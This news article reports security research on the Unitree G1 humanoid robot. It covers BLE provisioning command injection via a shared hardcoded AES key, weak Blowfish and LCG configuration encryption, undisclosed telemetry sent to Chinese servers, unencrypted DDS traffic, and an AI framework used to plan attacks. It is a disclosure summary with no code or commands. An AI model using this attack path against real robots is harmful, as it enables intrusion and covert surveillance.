Categories: Technology / Cybersecurity

Humanoid Robot Security Crisis: Unitree G1 Exposes Bluetooth and Data Leaks

Humanoid Robot Security Crisis: Unitree G1 Exposes Bluetooth and Data Leaks

Overview: A humanoid under threat

A new wave of research reveals that the Unitree G1 humanoid robot is vulnerable to a Bluetooth Low Energy (BLE) attack that can grant attackers root access, enabling covert surveillance and potentially harmful cyber operations. Alias Robotics’ analysis shows a chain of weaknesses—from setup provisioning to encryption and data channels—that together make the G1 a potent tool for espionage and intrusion when left unaddressed.

Exploiting the setup: BLE provides the entry point

The core issue lies in how the robot handles its initial setup over BLE. During Wi-Fi provisioning, the G1 uses BLE to receive the network name and password. The data pathway lacks robust input filtering, and all Unitree G1 units (along with other models from the same company) share a single hardcoded AES key. This combination enables anyone within BLE range to inject commands and gain root access via the provisioning daemon. In short, proximity plus universal credentials can unlock remote control of the robot.

Impact of a shared key

Once an attacker breaches provisioning, they can alter credentials or add remote accounts, effectively maintaining control over the device. The use of a single, hardcoded key across all hardware amplifies the risk, turning a local vulnerability into a widespread threat vector for fleets of robots.

Encryption weaknesses: two layers, two flaws

Alias Robotics’ analysis also scrutinizes the robot’s configuration protections. The outer encryption layer relies on Blowfish in a basic mode that repeats patterns, a known insecure approach. More alarmingly, every Unitree G1 uses the same 128-bit key, meaning that cracking one robot’s data can unlock all others. This key was extracted directly from the robot’s software, undermining the confidentiality of the entire fleet.

The inner layer adds a Linear Congruential Generator (LCG) for a pseudo-random transformation. Although researchers reconstructed the LCG logic, the seed space is limited to 32 bits, making brute-force recovery feasible. Together, these layers expose configuration files—containing service settings, process names, and network details—to anyone who can decrypt them.

Data exfiltration: unapproved transmissions to foreign servers

Traffic analysis shows the G1 relentlessly transmits data to servers in China. Battery status, joint torque, motion state, and sensor data from cameras, microphones, and internal services are sent in five-minute JSON packets to two ports (17883). A live WebSocket session to a third server operates over SSL without certificate verification, enabling ongoing, potentially sensitive exchanges that could include voice or video data. Users are not informed of these transfers, and there is no opt-out mechanism in place.

From a regulatory perspective, such behavior may breach GDPR provisions in Europe (Articles 6 and 13) and California privacy laws in the U.S. that require explicit consent for data tracking. The absence of visible indicators compounds the privacy risk.

System architecture: many doors, few protections

The robot’s internal network uses several communication systems: DDS/RTPS for internal sensor-actuator messaging, MQTT and WebRTC for cloud connectivity and remote control. Alarmingly, DDS traffic is unencrypted, meaning anyone on a local network can eavesdrop. WebRTC’s TLS checks are disabled on the client side, allowing impersonation of legitimate services by anyone with network access. When you combine BLE exposure, weak encryption, and unsecured cloud channels, the G1 presents multiple pathways for attackers to move laterally across its systems.

From surveillance to offensive capability: two case studies

Researchers demonstrated a dual-use scenario. First, the robot can act as a covert surveillance device, automatically linking to telemetry servers and transmitting audio, video, and spatial data from sensors. A unit placed in an office or lab could map facilities and relay information covertly. Second, the team showed an autonomous attack possibility by installing a cybersecurity AI framework that conducts reconnaissance, vulnerability scanning, and exploitation planning. It identified open channels and confirmed the ability to inject commands via the same BLE flaw, potentially exploiting OTA updates and cloud paths. While the researchers paused before executing attacks, the study confirms that a compromised robot could pivot from data collection to intrusion against other networked devices.

Lessons for the robotics industry

The findings underscore a need for a paradigm shift in robot security. Static defenses and one-off audits are insufficient when devices combine software, sensors, and wireless connectivity. The authors advocate for adaptive security systems powered by cybersecurity AI that can detect and counter threats automatically, more robust provisioning protocols, and encryption standards that do not rely on shared keys. Only with a holistic, proactive security approach can humanoid robots earn trust in real-world deployments.